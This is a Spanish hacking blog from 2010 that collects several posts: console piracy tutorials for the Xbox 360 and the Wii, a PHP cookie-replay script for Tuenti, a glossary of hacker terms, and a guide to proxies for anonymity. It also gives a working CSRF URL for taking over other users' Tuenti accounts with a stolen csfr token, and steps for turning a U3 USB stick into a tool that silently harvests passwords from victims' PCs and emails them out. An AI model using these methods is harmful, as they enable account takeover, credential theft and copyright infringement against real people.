y
Recibe las actualizaciones directo a tu correo

viernes, 26 de marzo de 2010

COMO PIRATEAR LA XBOX



Hoy os dire como piratear la xbox

Si te compraste una Xbox 360 antes de la odiosa crisis y ahora no tienes dinero para gastártelo ni en un misero juego, este es tu tutorial. Te enseñaremos paso a paso como piratear tu videoconsola sin necesidad del siempre odioso chip. Y cuando lo consigas y tengas todos los juegos que soñabas a un solo click



Una cosa a tener en cuenta cuando pirateemos la consola, es que NO podremos jugar online.

Es muy sencillo, tan solo tendremos que abrir la consola, para sacar el disco duro, conectarlo a nuestro pc, formatearlo y ponerle el nuevo firmware pirata.


NECESITAREMOS:

- Una llave Allen del numero 2.

- Un destornillador pequeño también del numero 2.

- Un cable serial Ata (es opcional porque vale el mismo cable que hay en el lector de la Xbox 360 pero viene bien uno mas largo por comodidad).

1ª PARTE: DESMONTAR LA XBOX 360

Sigue este artículo para saber cómo desmontar tu Xbox 360.

2ª PARTE: CONECTAR LA XBOX 360 AL PC

Vamos a hacerlo con el modo SLAX para pasar al modo Debug el lector de Hitachi (ya que es el más fácil) y aunque hay otros métodos, estos pueden estropear tu Xbox 360.

Si aun así, siguiendo estos pasos no te reconoce el lector de Xbox 360 windows, debes comprarte un Connectivity Kit.

Para empezar necesitaremos lo siguiente:

- EL firmware, en esta ocasión vamos a utilizar el HACK Hitacho de Flash78: Descargar aquí.

- El SLAX grabado en un CD. Podéis descargarlo de aquí: Descargar SLAX

- Un ordenador :-). Hemos utilizado una placa base Gigabyte 2004 GT Edition (GA-8IPE1000-L).

- Los cables de la luz y los de la TV.

1º) Cogemos la Xbox 360 desmontada y la conectamos por ATA al PC mediante el cable SATA.



2º) Después de conectarlo al PC debes enchufar la X360 a la corriente y a una televisión.



3º) Una vez conectado todo. Encendemos el PC y apretamos a suprimir todo el rato hasta que salga una pantalla azul.



4º) Dentro de ella elegimos “Advanced BIOS features”.



5º) Debemos elegir “First boot device” y apretamos enter. Nos saldrá una ventanita con una lista para elegir, entonces elegimos: CDROM.

Después solo tenemos que apretar escape una vez y saldremos al menú anterior. En el menú anterior apretamos a: SAVE & EXIT SETUP y nos preguntará si queremos guardar. Pulsamos Y (Yes) como se muestra en la siguiente imagen.



6º) Ahora debemos reiniciar el ordenador, ENCENDER LA XBOX 360 e insertar el CD SLAX que nos hemos descargado y grabado en un CD previamente.



7º) Una vez insertado debes esperar a que se ejecute el SLAX. Verás como una etiqueta con un trébol.

8º) Si tu ordenador reconoce el lector de Xbox 360 debería salir algo como esto: GDR3120L detected!-> switching to ModeB thanks to kev.nu



9º) Sigues esperando sin tocar nada hasta que te salga esto al final: looking for data modules



10º) Si has llegado hasta “looking for data modules” estas de enhorabuena. Ahora tienes que apretar con un bolígrafo bic el botón de expulsar del lector de la Xbox 360 para que se habrá la bandeja. Si no lo haces estará todo el rato en “looking for data modules”.

Al abrir la bandeja empezará a moverse otra vez. Pues cuando llegue a “slax login” debes reiniciar el PC con la XBox 360 conectada y sin apagarla.

¡¡IMPORTANTE!!: A partir de aquí no apagues la Xbox 360 ni la desconectes del PC, podría ser catastrófico.



11º) Ya tienes tu Lector Hitachi en modo debug ^_^

Cuando se inicie windows ves a la carpeta donde tengas descargado el IXTREME_HITACHI_1.2 de Flash78 y lo descomprimes.

12º) Entras dentro de la carpeta y ejecutas Hack360Hitachi.exe y te saldrá un menú.



13º) Solo debes elegir: “Instalar iXtreme 1.2 Sthealh” y seguir los pasos.

14º) Una vez finalizado ya tienes flasheado tu lector hitachi.

15º) Ahora ya solo queda conectar el Cable SATA del lector a la Xbox 360 de nuevo y montarla.

Con esto habrás conseguido cambiar el firmware de tu lector hitachi. Y ya podrás jugar a todos los juegos pirata!!!!

Y a viciar

Hasta otra

miércoles, 24 de marzo de 2010

COMO PIRATEAR LA WII


TUTORIAL PARA PIRATEAR LA NINTENDO WII
A lo largo de la existencia de la consola Wii, han existido un sin número de manuales para poder correr copias
de juegos sin necesidad de un chip, pero pocas han sido totalmente funcionales.
Ahora existe un software que podremos descargar gratuitamente tan sólo buscando en Google. Dicho
programa se llama Backup Launcher que está ahora en la versión 0.3 Beta.
Acá les indicaremos qué pasos deben seguir para poder hacer lo que ya hemos dicho.
1er Paso: Tenemos que instalar el canal homebrew que al termino del manual, les diremos qué es y cómo
funciona.
2do Paso: Descargamos el instalador del cIOS (el que encontraremos buscando en Google) y el Backup
Launcher 0.3 Beta (de WiiGator).
3er Paso: Al tener los dos archivos anteriores, los colocamos dentro de la carpeta "apps" de la tarjeta SD que
dispongas.
4to Paso: Este paso se puede realizar de dos maneras diferentes que pasaremos a explicar:
- Ejecutar Homebrew Channel y cargar el cIOS Installer. Dentro de esta aplicación nos descargará los archivos
necesarios si es que tienes conexión WiFi e instalará automáticamente el custom IOS.
-Si no tienes conexión WiFi en tu Wii, entonces puedes descargar los siguientes archivos:
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/tmd.1042
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/cetk
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/00000000
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/00000001
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/00000002
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/00000003
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/00000004
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/00000005
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/00000006
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/00000007
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/00000008
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/00000009
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/0000000a
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/0000000b
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/0000000c
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/0000000d
http://nus.cdn.shop.wii.com/ccs/download/0000000100000024/0000000e
y cópialos en la carpeta /00000001/00000024/v1042/ de la tarjeta SD que, obviamente, hay que crear.
5to Paso: Introducir el DVD con la copia del juego que quieras correr.
6to Paso: Volvemos a ejecutar Homebrew Channel y también Backup Launcher. Ahora podemos correr la
copia del juego sin ningún problema!!.
Ahora les explicaremos qué es el Hombrew Channel:
El Homebrew Channel es una aplicación en forma de canal que sirve para la consola Wii, el que te permite
lanzar programas sin necesidad de ejecutar el Twilight Hack.
Homebrew permite cargar aplicación usando la red o un USB Gecko en una interfaz muy profesional y limpia.
Para instalarlo puedes hacerlo de dos formas diferentes:
- Si tienes chip, puedes hacerlo con un disco autoejecutable.
- Si no tienes chip, deberás usar Twilight Hack.
Una vez que tengas descargado el Homebrew Channel (se baja mediante Twilight Hack) debes descomprimir
el archivo y copiar el fichero boot.elf a la raíz de la tarjeta SD. Preferentemente la SD deberá ser de un tamaño
menor a 2 GB y en formato FAT 16.
Ejecutamos la aplicación por medio de Twilight Hack y reseteamos para comenzar la instalación.
Al comenzar sólo se mostrará una pantalla con burbujas, donde deberás crear una carpeta 'apps' en la raíz de
la tarjeta SD donde copiaremos las aplicaciones (cada cual en su subdirectorio).
Cada carpeta debe tener el ejecutable de nombre boot.extensión. Por ej.: si es una imagen de la aplicación,
entonces deberá llamarse icon.png, si es un archivo que describa la aplicación, deberá llamarse meta.xml y así
sucesivamente.
Los creadores de ésta aplicación (Homebrew Channel) también nos ofrecen un paquete con otras aplicaciones
que también nos servirán y que además, contienen el mismo esquema. Sólo deberemos extraer el contenido
de la carpeta hbc_apps en el directorio raíz de nuestra tarjeta SD.
La explicación y el funcionamiento del Twilight Hack puedes encontrarlo en ésta dirección:
http://wiibrew.org/wiki/Twilight_Hack/es
Bueno, esperamos que hayan entendido todos los pasos del tutorial y que les sirva de ayuda para correr todos
los juegos que quieran en su Wii, sin tener que gastar tanto dinero por cada uno. ;)

En los dias venideros os dire como piratear cualquier consola

Script o programa para modificar el estado de tuenti




Hay una vulnerabilidad o fallo en tuenti que nos permite cambiar el estado de nuestra cuenta aleatoria mente.

En cierta manera es una forma de hackeo de tuenti.

Aquí el script.


$val = rand(1, 5);

if ($val == “1″) {
$sta = “Estoy genial”;
} elseif ($val == “2″) {
$sta = “no quiero mas eventos”;
} elseif ($val == “3″) {
$sta = “nooooo”;
} elseif ($val == “4″) {
$sta = “Sandraaa la mejorr”;
} elseif ($val == “5″) {
$sta = “MUAKA”;
} else {
$sta = “na de na”;
}

$string = “msid=NjUwMzM2zETgzMzczQ6MTI1NTk4DE5OQ”;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “http://m.tuenti.com/?m=profile&func=process_set_status&from=home&csfr=******”);
curl_setopt ($ch, CURLOPT_POSTFIELDS, “status=”.$sta);
curl_setopt($ch, CURLOPT_COOKIE, $string);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$text = curl_exec($ch);
curl_close($ch);
die($text);
echo(”Programado por Dimitrix”);
?>



El programa lo que hace es enviar peticiones con tu cookie al servidor de tuenti


y esto es todo
Bueno hasta otra

Tuenti sin secretos





Hoy vamos a explicar como hackear una cuenta de Tuenti.

Para conseguirlo sólo necesitas conocer el código csfr del usuario. Para conseguirlo puedes intentar "engañarle" o conseguirlo gracias a Tuenti Plus.

Una vez que tengas ese código, tienes que invitar al usuario a un evento y poner en la página web del evento la siguiente dirección:

http://wwwb4.tuenti.com/?aj=&m=settings&sett=micuenta&func=savesettings_email&email2=tuemail@hotmail.com&csfr=codigo_csfr_robado

Si el usuario accede a esta dirección te llegará a tu e-mail una serie de pasos para que puedas cambiar su contraseña y su correo electrónico.

Este truco no siempre funciona digamos que tiene un 30% de efectividad pero ya os dare uno mejor

UN POKITO DE CULTURA






Un hack es la palabra utilizada en determinados sectores de las tecnologías para denominar a las pequeñas modificaciones que se le pueden hacer a un programa o máquina para mejorar o alterar su funcionamiento. Particularmente si se trata de una solución creativa o poco convencional a un problema.

De esta palabra han derivados otras como hacker.






Hacker es el neologismo utilizado para referirse a un experto en varias o alguna rama técnica relacionada con las tecnologías de la información y las telecomunicaciones: programación, redes de computadoras, sistemas operativos, hardware de red/voz, etc. Se suele llamar hackeo y hackear a las obras propias de un hacker.

El término "Hacker" trasciende a los expertos relacionados con la informática, para también referirse a cualquier profesional que está en la cúspide de la excelencia en su profesión, ya que en la descripción más pura, un hacker es aquella persona que le apasiona el conocimiento, descubrir o aprender nuevas cosas y entender el funcionamiento de éstas.

Hacker, usando la palabra inglesa, quiere decir divertirse con el ingenio [cleverness], usar la inteligencia para hacer algo difícil. No implica trabajar solo ni con otros necesariamente. Es posible en cualquier proyecto. No implica tampoco hacerlo con computadoras. Es posible ser un hacker de las bicicletas. Por ejemplo, una fiesta sorpresa tiene el espíritu del hack, usa el ingenio para sorprender al homenajeado, no para molestarle.



Orígenes
Se dice que el término de Hacker surgió de los programadores del Massachusetts Institute of Technology (MIT), que en los 60, por usar hacks, se llamaron a sí mismos hackers, para indicar que podían hacer programas mejores y aun más eficaces, o que hacían cosas que nadie había podido hacer.

También se dice que la palabra deriva de hack, hachar en inglés, término que se utilizaba para describir la forma en que los técnicos telefónicos arreglaban cajas defectuosas, un golpe seco. Y la persona que hacía eso era llamada hacker.

Los hackers no son piratas. Los que roban información son los crackers. En este sentido, se suele decir que el sistema GNU/Linux ha sido creado y es mantenido por hackers. GNU/Linux es el sistema operativo nacido como consecuencia de la unión de GNU y de Linux. El kernel (o núcleo) del sistema, Linux, fue creado por el hacker Linus Torvalds y dio el nombre a este sistema al mezclar su primer nombre con el del sistema operativo Unix. Si bien esta definición es bastante artificial ya que ni Linus Torvalds ni ninguno de los principales desarrolladores del kernel Linux se han referido a sí mismos como Hackers.

También se asocia el termino hacker a aquellas personas que poseen elevados conocimientos de seguridad informática, en estos casos se suele distinguir entre "White hats" (sombreros blancos / los buenos ) o "Black hats" (sombreros negros / los malos o Cracker), según una clasificación de sus acciones (según sean sólo intrusivas o además destructivas). Aunque recientemente también ha aparecido el termino "grey hat" ("sombrero gris") para referirse a aquellos hackers que ocasionalmente traspasan los limites entre un tipo u otro, o los que realizan acciones que sin ser moralmente reprobables se pueden considerar como ilegales o viceversa.

Hacker vs Cracker
El término actualmente es algo ambiguo, ya que también se utiliza para referirse a:

Aficionados a la informática que buscan defectos, puertas traseras y mejorar la seguridad del software, así como prevenir posibles errores en el futuro (ver: Agujeros de seguridad).

Delincuentes informáticos, o crackers, que es su uso más extendido, y según algunos grupos de opinión sería incorrecto.

Los llamados crackers (que significa rompedores) o "Black hat" (sombreros negros) usan su conocimiento con fines maliciosos, antimorales o incluso bélicos, como intrusión de redes, acceso ilegal a sistemas gubernamentales, robo de información, distribuir material ilegal o moralmente inaceptable, piratería, fabricación de virus, herramientas de Crackeo y elementos de posible terrorismo como la distribución de manuales para fabricar elementos explosivos caseros o la clásica tortura china. El Cracker se distingue del Hacker por sus valores morales, sociales y políticos.

Dentro de la cultura underground del Hacking , Hacker es toda aquella persona con elevados conocimientos informáticos independientemente de la finalidad con que los use. Mientras que Cracker es aquel individuo que se especializa en saltar las protecciones anticopia de software, de ahí el nombre crack para definir los programas que eliminan las restricciones en las versiones de demostración de software comercial.

Bueno y esto es todo, No solo de trucos vive el hacker Tambien hay que saber los origenes de las cosas.

No crees

sábado, 20 de marzo de 2010

como esconder la ip

Como Esconder tu IP
Para empezar, te recomiendo buscar textos sobre wingates, socks y proxies (además, dehabilitá el java, javascript, cookies, links relacionados y actualización automática ... y tené en cuenta que si pretendés ocultar tu identidad, Internet Explorer no es la mejor opción). Intenta también instalar un firewall o DHCP...

Hay situaciones en las cuales queremos visitar un site sin dejar rastros en él, puede que tengas ganas de espiar el site de la competencia. Tu visita quedará registrada en un archivo LOG del servidor. Los visitantes frecuentes generan muchos registros.

Estos registros pueden brindar información al administrador de la red, información que es enviada desde nuestra PC sin que nos enteremos.

Sin embargo, para que el servidor guarde estos datos no necesita hacer pruebas demasiado sofisticadas. Un "snooper" dedicado podría averiguar mucho más. Ha habido algunos casos de sitios que han intentado acceder al disco rígido del visitante (un caso un tanto extremo). También hay miles de casos que involucran cookies (http://www.illuminatus.com/cookie.fcgi), código javascript y applets java malintencionados, agujeros de seguridad en los navegadores, etc, así que la mejor opción es navegar con un intermediario que entre a los sitios por nosotros.

Paso 1 - Determinar tu dirección IP:

Para averiguar tu propia dirección IP andá a http://megawx.aws.com/support/faq/software/ip.asp

Cada computadora conectada a Internet tiene un número identificador único llamado "dirección IP". En la mayoría de las redes la dirección IP de una PC es siempre la misma. En algunas otras, ésta se asigna cada vez que la PC se conecta a la red. A eso me refiero cuando pregunto si tenés dirección estática o dinámica. Si tu IP es dinámica seguro que será distinta cada vez que te conectes.

Hay una explicación muy completa sobre números IP (qué son y cómo funcionan) AQUÍ

Paso 2 - Lograr navegar anonimamente:

Método 1: Anonymizer

Cualquiera puede navegar anonimamente con la ayuda de un excelente servicio llamado "Anonymizer x" (http://www.anonymizer.com/3.0/index.shtml). Visitalo y escribí allí el URL que querés ver anónimamente ("Anonymizer" hace todo el trabajo por vos, eliminando varios peligros potenciales). Cuando seguís un link que hay en una página a la que entraste via Anonimyzer, el mismo se abre también via Anonymizer, de modo que no tengas que tipear a mano todas las direcciones a las que quieras ir. Este sitio te da la opción de pagar el servicio o usarlo gratis, pero si lo usamos gratis nos encontraremos con una serie de limitaciones, tales como una demora de 30 segundos en la descarga de la página, y acceso anónimo sólo a sitios con protocolo HTTP (no HTTPS ni FTP). Por otra parte, existen sitios que son inaccesibles a través de Anonymizer, como ser algunos servidores de e-mail por web.

Otro servicio que nos puede prestar Anonymizer es el de "acercarnos" las páginas web lejanas, por ejemplo, si una página está ubicada en Japón y algún problema de enlace no nos permite conectarnos rápidamente (es decir: no la podemos ver), podemos pedirle a Anonymizer que entre a ella por nosotros y nos la muestre luego. Probablemente Anonymizer tenga un mejor enlace con Japón que el que tenemos nosotros, y esto nos solucionaría el problema. Por último, hay algunos sitios que nos muestran distinta información de acuerdo al lugar geográfico desde el cual entremos. Por ejemplo: El sitio de la Enciclopedia Británica (en la sección dedicada a "enviar el pedido de compra") ofrece un listado de representantes en cada país, pero al entrar a través de Anonymizer aparece en su lugar otra página en la cual podemos ver los precios que tienen en USA (hogar de Anonymizer). No es dificil imaginar que los precios de los representantes son varias veces mayores que los precios en USA.

Anonymizer es una de las herramientas más populares para navegar anonimamente, pero no es la única. Continuamente aparecen sitios que ofrecen servicios similares. Una buena alternativa es JANUS (http://www.rewebber.de/) ubicado en Alemania. Es rápido, puede encriptar el URL, y además es gratuito. Lo siguiente es un fragmento de las aclaraciones que hay en el sitio de JANUS:

"JANUS es capaz de encriptar los URLs (las direcciones de las páginas) de modo que puedan ser usadas como referencia al servidor. Si se da el caso en que una dirección encriptada sea solicitada, JANUS podrá desencriptarla y reenviarla al servidor, sin necesidad de que el usuario sepa cuál es la verdadera dirección. Todas las referencias en la respuesta del servidor son encriptadas también, antes de que lleguen al usuario." (una variante muy interesante al servicio de anonimato... anonimato para servidores!)

Metodo 2: Servidores Proxy

También es posible lograr el anonimato en la navegación interponiendo un servidor proxy. Este servicio es similar al de Anonymizer, ya que las páginas son solicitadas por el proxy en lugar de la persona que realmente está navegando. Pero hay algunas diferencias muy importantes: los proxies no filtran los cookies, applets ni código malintencionados. En definitiva, lo único que hacen es ocultar nuestra posición geográfica.

Casi todos los servidores proxy tienen el acceso restringido a los usuarios del proveedor en el cual se encuentra, es decir... si usamos Fibertel no podremos utilizar el proxy de Sinectis (el acceso será denegado). Por suerte, siempre hay por allí algún proxy generoso que ofrece sus servicios al público en general, intencionalmente o debido a un error en la configuración (claro que los motivos suelen no ser públicos).

Cómo podemos encontrar estos Proxies "generosos"? Buena noticia para los perezosos: hay muchas listas de servidores proxy públicos, sin ir más lejos: http://tools.rosinstrument.com/cgi-bin/dored/cgi-bin/fp.pl/showlog

Para quienes no son tan perezosos: encuentren sus propios servidores proxy, es fácil. Vayan a Altavista (www.altavista.com) y escriban algo como +proxy +server +configuration +port, y van a recibir la lista de páginas web en las que los proveedores de Internet dan instrucciones completas a sus usuarios sobre cómo configurar sus navegadores para usar sus proxies. Prueben con cada proxy que hayan encontrado, y luego de 6 o 7 fallas (servicios "restringidos") encontrarán seguramente uno que ande. Suponiendo que hayan encontrado uno, digamos cualquier.proxy.com, HTTP port 8080. Para hacerlo funcionar en tu conección tenés que llenar (en tu navegador) los datos en la sección "Configuración manual de servidor proxy".

Configurando:

En Netscape Communicator:
Editar - Preferencias - Avanzado - Proxies - Configuración manual de proxy - Ver, y para HTTP y FTP escribí el nombre de tu servidor (ejemplo: proxy.datafull.com) y número de port (ejemplo 3128).

En Internet Explorer 4.0:
Ver - Opciones de Internet - Conexiones - marcar "Acceder a Internet usando un servidor proxy". Donde dice DIRECCIÓN escribir el nombre (ejemplo: proxy.datafull.com) y en PORT escribir el número de puerto (ejemplo: 3128), hacer click en opciones avanzadas y marcar donde dice "Usar el mismo proxy para todos los protocolos".

Una vez hecho todo esto ya podés empezar a navegar dejando el rastro de que estás en Bulgaria, USA, Corea del Norte o donde quiera que se encuentre el proxy, pero ...aún hay un tema importante a tener en cuenta, "¿Mi proxy... es realmente anónimo?"

¿Mi proxy es realmente anónimo?

No todos los proxies son del todo anónimos. Algunos de ellos dejan que el administrador del sistema (del sitio visitado) averigüe la dirección IP desde la cual nos estamos conectando al proxy, o sea, nuestra dirección IP real. Una vez que estés usando un proxy vas a poder hacerle una prueba de anonimato en la siguiente dirección: http://www.tamos.com/bin/proxy.cgi

Si recibís el mensaje "Proxy server is detected!" - entonces hay un agujero de seguridad en el proxy que estás usando, y los servidores web es capaz de averigüar tu verdadero IP. La información sobre tu verdadero IP va a aparecer en la página web. Si el mensaje que recibís es "Proxy server not detected" - significa que estás navegando anónimamente. De todos modos recomiendo estudiar cuidadosamente la lista de direcciones IP que esa página nos devuelva. Ninguno de ellos debería ser el tuyo. También podés realizar otras pruebas para ver si tu navegador es anónimo. Dichas pruebas pueden darte una lista completa de parametros que tu navegador deja saber al sitio web que visitas. (esa información está contenida en las llamadas "variables de entorno"). Proxys-4-All (http://proxys4all.cgi.net/tools.html) siempre tiene una larga lista de testeadores para esto.

Consideraciones Finales:

A pesar de todo lo dicho anteriormente ... usá proxies sólo cuando sea necesario. Navegar a través de proxies reduce considerablemente la velocidad de la transferencia de datos. Otra consideración importante que la gente suele olvidar: usá los proxies para propositos legales. Esconder tu identidad es aceptable si no querés que los servidores recopilen datos sobre vos, pero si ocultas tu IP para comprar CD´s, libros o software con una tarjeta de crédito falsa hay una buena posibilidad de que termines en la carcel, eso sin contar los aspectos morales. No te olvides de que todas las conexiones son logeadas, y si violaste una ley podrías ser rastreado, al menos en los países en los cuales la ley actúa en serio. El adminstrador del sitio podría leer los registros y contactar al administrador del proxy, y este último leería los suyos y averiguaría tu IP verdadero, entonces ambos contactarían a tu proveedor de Internet y ya tendrían tu nombre y dirección, y si usaste una cuenta que no es tuya, al menos tendrían el teléfono desde el cual llamaste... espero que haya quedado claro.

Especial para paranoicos:

Esto es interesante: Las herramientas que vimos hasta ahora pueden ser encadenadas!
Por ejemplo, si estás usando el Proxy A, y sabés las direcciones de otros dos proxies (Proxy B y Proxy C). La dirección que deberías solicitar sería algo así como http://proxyB:puerto/http://proxyC:puerto/http://www.lapagina.com ... Como resultado, accederías a www.lapagina.com a través de 3 proxies anónimos: A (que está configurado en el browser) B y C (que están en el url que escribiste).

Otro ejemplo más realista podría ser: http://proxy.usnowear.com:8080/http://proxy.barcelonaweb.com:8080/http://www.datafull.com

Cuidado: No todos los proxies permiten ese tipo de encadenado.

SocksCap - para usar anónimamente aplicaciones que no sean HTTP (telnet, ftp, ICQ, RealPlayer, etc)

Qué es SocksCap?
SocksCap permite que las aplicaciones clientes basadas en TCP y UDP pasen a través de un firewall ubicado en un servidor del tipo SOCKETS. SocksCap intercepta las llamadas hechas a la red desde aplicaciones WinSock y las redirige a través de un server SOCKS de manera transparente para las aplicaciones o el sistema operativo y drivers.

Cuál es la última versión?
La versión actual de SocksCap16 (16-bit) es la 1.02. La versión más reciente de SocksCap32 (32-bit) es la 1.03. También existe una versión beta de SocksCap32 Version 2 (Beta 3).

Cuál es la diferencia entre SocksCap, SocksCap16, y SocksCap32?
El número se refiere a las versiones de 16 y 32 bits. SocksCap16 es la version de 16-bits. SocksCap32 es la de 32-bits.

Necesito SocksCap16, SocksCap32, o los dos?
Para Windows 3.1 y Windows para trabajo en grupo 3.11 necesitás SocksCap16.
Para Windows 95 y Windows 98 necesitás SocksCap32 para las aplicaciones de 32-bits. Si además estás ejecutando alguna aplicación de 16 bits (algún programa viejo quizás) bajo Windows 95 o 98, necesitás SocksCap16 para esas aplicaciones. Es posible ejecutar SocksCap16 y SocksCap32 a la vez para manejar todas las aplicaciones (de 16 y 32 bits).
En Windows NT o 2000, usá SocksCap32. (Estos sistemas operativos no permiten software de 16 bits.

Dónde puedo conseguir SocksCap?
SocksCap está disponible para descarga en el sitio web de SOCKS en: http://www.socks.nec.com/.

SocksCap es gratis? Y el codigo fuente, está disponible?
El programa se puede bajar gratis del sitio web de SOCKS. No está librado al dominio público. Su uso y distribución está restringido y sujeto a ciertos acuerdos. El código fuente no está disponible.

Funciona con todas las aplicaciones?
SocksCap funciona independentemente de las aplicaciones que usemos, pero puede presentar algunos problemas en ciertos casos.

Cómo sé si funciona con mi aplicación?
La mejor manera de saber eso es probarlo. Podrías referirte a la tabla de aplicaciones con las cuales los usuarios han reportado éxito o fracaso. Bajate la lista de la sección SocksCap del sitio http://www.socks.nec.com/.

Es necesario que use el FTP en modo de transferencia pasiva?
FTP puede experimentar dificultades, dependiendo de la aplicación y el stack. Intenta sin el modo pasivo, si no anda, intenta con el pasivo.

Cómo se configuran el servidor de SOCKS y el puerto en el setup de SocksCap?
Escribe la dirección y puerto del servidor SOCKS que querés atravezar. Si no estás seguro de lo que eso quiere decir, contacta a tu ISP o administrador de red o firewall o consulta una lista en: http://tools.rosinstrument.com/proxy/1080.htm.

miércoles, 17 de marzo de 2010

Sacale uso a tu pendrive

Hoy os enseño a combretir vuestra llave en una herramienta "hack"

Espero que os guste


Convierte tu U3 USB Smart en una poderosa herramienta hacking La ejecución automática de la U3 podría usarse con fines diversos al almacenamiento de información en la misma, decidí buscar en Internet y afirmativament e servía como una herramienta hacking.




La U3 junto a un software especial instalado es capaz de sacar las contraseñas de un PC, sea del Internet Explorer, FireFox, Outlook, entre otros. También la información de conexión, el modem, password del wi-fi, hasta el historial de navegación del IE o FF.

Si tienes una SanDisk U3, aquí tienes cómo instalarlo:
Cómo se instala?

1. Descarga GonZor=- Payload V2.0 2.
2. Descarga Universal Customizer
3. Descomprime el Universal Customizen en C:\Universal_Customizer.
4. Descomprime el -=GonZor=- Payload V2.0 en C:\Payload.
5. Copia el archivo U3CUSTOM.ISO de C:\Payload y pégalo en C:\Universal_Customizer\BIN reemplazando el antiguo.
6. Ejecuta C:\Universal_Customizer\Universal_Customizer.exe y conecta tu memoria al PC.
- Selecciona Accept y dale clic en Next.
- Cierra cualquier aplicación U3 o cualquier programa que tenga acceso a esta.
- Selecciona un password para hacer un backup de tu información de la memoria (la va a formatear).
- Clic en Next y empezará a grabar tu infomación de la memoria al disco duro, espera a que la memoria U3 culmine su trabajo. - Ya todo debe estar completo, desconecta tu memoria y conéctala de nuevo.
7. Copia C:\Payload\SBconfig.exe en tu memoria USB U3.
8. Ejecuta SBconfig.exe desde tu memoria.
- Selecciona las opciones de la izquierda que te gustaría usar, recomiendo habilitar todas.
- Crea una cuenta de GMAIL nueva para usar el HackSaw.
- Cliquea en Update Config para actualizar tu configuración, debe aparecer un mensaje de confirmación.
- Para habilitar o deshabilitar el software haz clic en Turn U3 Launchpad On y Off respectivament e.
9. Ahora debes tener instalado -=GonZor=- en tu U3!
Podrás sacar passwords de cualquier equipo Windows XP o Vista sólo si está en modo Administrador.

Te recomiendo una vez finalices estos pasos y actives el software, no vuelvas a meter la memoria en tu equipo, de lo contrario quedará instalado HackSaw en tu PC y enviará toda la información de tu memoria al correo que usaste anteriormente, robándote mucho ancho de banda.

Cada vez que pongas la memoria en algún equipo asegúrate de deshabilitar el Launchpad (Turn Launchpad Off), para que puedas meterlo en tu equipo.

Los logs (contraseñas, historiales, datos.) quedarán guardados en tu memoria U3 Smart exactamente en: %pendrive%:\System\Logs\%NOMBRE_DEL_PC_HACKEADO%
siendo %pendrive%: la letra de unidad de tu memoria.


y esto es tod hasta otra